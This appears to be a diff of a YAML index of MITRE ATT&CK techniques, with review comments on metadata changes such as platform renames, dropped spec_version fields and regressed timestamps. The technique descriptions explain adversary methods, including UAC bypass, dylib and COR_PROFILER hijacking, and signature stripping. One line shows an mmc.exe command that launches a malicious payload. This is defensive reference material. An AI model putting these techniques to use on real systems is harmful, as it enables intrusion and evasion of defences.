- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
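Review bot: `x_mitre_permissions_required: [User]` is removed from T1578.001 with no replacement in this hunk, and the Mandiant M-Trends 2020 reference changes its URL from the content.fireeye.com landing page to a PDF on mandiant.com while keeping "Retrieved April 24, 2020" as its retrieval date. Both look like upstream data changes rather than generator behaviour, but the field removal deserves a line in the commit message so a consumer filtering on `x_mitre_permissions_required` knows why the value vanished, and the retrieval date should be refreshed if the new URL was actually verified.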
@@ -14133,6 +14418,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -14143,13 +14429,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
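Review bot: The platform list for T1550.001 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider` (with `x_mitre_version` 1.6 to 1.7), and the same rename is applied to T1078.004 and T1556 further down. Any derived artefact keyed on the old platform strings, such as per-platform index files or filters that select techniques by `x_mitre_platforms`, will silently lose these techniques unless it is regenerated or remapped in the same change; please confirm that was done.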
@@ -14208,11 +14493,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14252,8 +14536,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -14261,13 +14547,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -14298,9 +14584,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -14361,7 +14644,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14383,11 +14666,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14454,8 +14736,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14473,7 +14755,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14576,12 +14857,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14594,6 +14874,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14630,17 +14911,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14686,9 +14967,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14726,7 +15004,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14745,7 +15023,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14776,7 +15053,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14800,12 +15077,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14889,7 +15164,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14911,7 +15185,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14945,12 +15219,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -15002,9 +15274,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -15073,7 +15344,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -15120,7 +15390,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -15133,12 +15403,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
@@ -15217,7 +15488,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15239,7 +15510,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -15282,7 +15552,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15306,8 +15576,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15355,7 +15623,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15393,8 +15661,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15443,7 +15709,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15495,29 +15761,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15564,7 +15829,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15596,8 +15861,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15611,6 +15876,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -15623,11 +15892,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
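Review bot: the removal of `- spec_version: '2.1'` here is the first of a pattern repeated in almost every technique object in this diff; STIX 2.1 objects normally carry `spec_version`, so the PR description should state why it is being dropped (generator change, or intentionally stripped from this index) and confirm that nothing consuming this file keys on it. The new `Stack Overflow` reference is fine structurally, but as an `(n.d.)` community Q&A page it is the weakest citation in this block; consider whether the answer's underlying Microsoft documentation can be cited instead.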
@@ -15693,7 +15965,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15782,7 +16053,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15870,7 +16140,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15955,7 +16224,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15987,7 +16255,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
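Review bot: the `modified` timestamp for T1546.006 moves backwards (`2022-05-11T14:00:00.188Z` to `2022-04-20T17:08:21.101Z`), and the same regression appears for several other entries below (T1548.002, T1548.003, T1547.014, T1055.003, T1546.011, T1037.002, T1055). The old values all share the `14:00:00.188Z` suffix, which suggests they were written by a previous export rather than taken from the upstream object; if the new values come from the canonical STIX bundle this is a correction and should be called out in the PR description, otherwise the source of the earlier dates needs checking before merging.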
@@ -16010,11 +16278,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -16072,14 +16339,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -16180,7 +16446,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -16211,7 +16476,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16245,13 +16510,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
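Review bot: after this hunk T1548.003 has neither `spec_version` nor `x_mitre_attack_spec_version` (both `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` are removed with nothing added), whereas entries updated elsewhere in the diff end up with `x_mitre_attack_spec_version: 3.2.0` (T1574.011 and T1053.003 below). Either this object should also gain the `3.2.0` value, or the PR should explain why this technique is left without an attack spec version.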
@@ -16270,7 +16533,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16284,7 +16546,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16311,8 +16572,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16343,12 +16604,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
